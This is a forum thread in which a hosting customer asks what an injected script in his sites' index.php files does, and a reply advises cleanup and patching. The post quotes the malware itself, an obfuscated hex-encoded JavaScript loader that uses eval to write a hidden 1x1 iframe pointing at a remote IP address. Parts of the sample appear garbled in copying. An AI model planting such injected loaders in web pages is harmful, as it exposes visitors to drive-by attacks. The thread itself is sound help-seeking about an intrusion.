SUSE index files being injected with Javascript code.threat?

Apperently alot of the index.php files on multiple sites i host on a SUSE box hosted on oneandone dedicated server are being injected with javascript code i posted below…

It opens up a frontpage office install on winxp when you go to the sites…

Anyone know what the code below is doing and what the threat level is?

I cleaned it up on some sites but left it on one for now as i dont know what it does

Anyone know?

infected site:mybalroom.com

Greatly apreciate your time
Pete

----code being injected
<script language=‘javascript’>function cirpfjyua(lsolytfeqrzhg, nzndhq){var jyaghrpagphcgiuwrxh = “”;for (var i = 0 ; i < lsolytfeqrzhg.length; ++i) xyloqymhhfkqdhgu += String.fromCharCode(nzncirpfjyuacirpfjyuacirpfjyua dhq ^(nzndhq ^ lsolytfeqrzhg.charCodeAt(i)));return xyloqymhhfkqdhgu;}var lsolytfeqrzhg = “\x20\x0d\x0a\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\ x77\x72\x69\x74\x65\x28\x27\x3c\x64\x69\x76\x20\x7 3\x74\x79\x6c\x65\x3d\x22\x76\x69\x73\x69\x62\x69\ x6c\x69\x74\x79\x3a\x68\x69\x64\x64\x65\x6e\x22\x3 e\x3c\x69\x66\x72\x61\x6d\x65\x20\x73\x72\x63\x3d\ x22\x68\x74\x74\x70\x3a\x2f\x2f\x38\x35\x2e\x31\x3 7\x2e\x31\x34\x33\x2e\x31\x35\x32\x2f\x22\x20\x77\ x69\x64\x74\x68\x3d\x31\x20\x68\x65\x69\x67\x68\x7 4\x3d\x31\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e\ x3c\x2f\x64\x69\x76\x3e\x27\x29\x3b\x0d\x0a\x0d\x0 a”; var xyloqymhhfkqdhgu = cirpfjyua(lsolytfeqrzhg, 121); eval(xyloqymhhfkqdhgu); </script>
--------END---------

Looks like your server got ‘pwned’, most likely via a cross scripting vulnerability in some of your software. Remove them all asap.

What distribution version, what Apache, are you running Suhosin hardening?

I would investigate all php scripts and similar software running on your server if they’ve had any security patches as of late - for example phpbb, joomlas, etc. software that you may be running.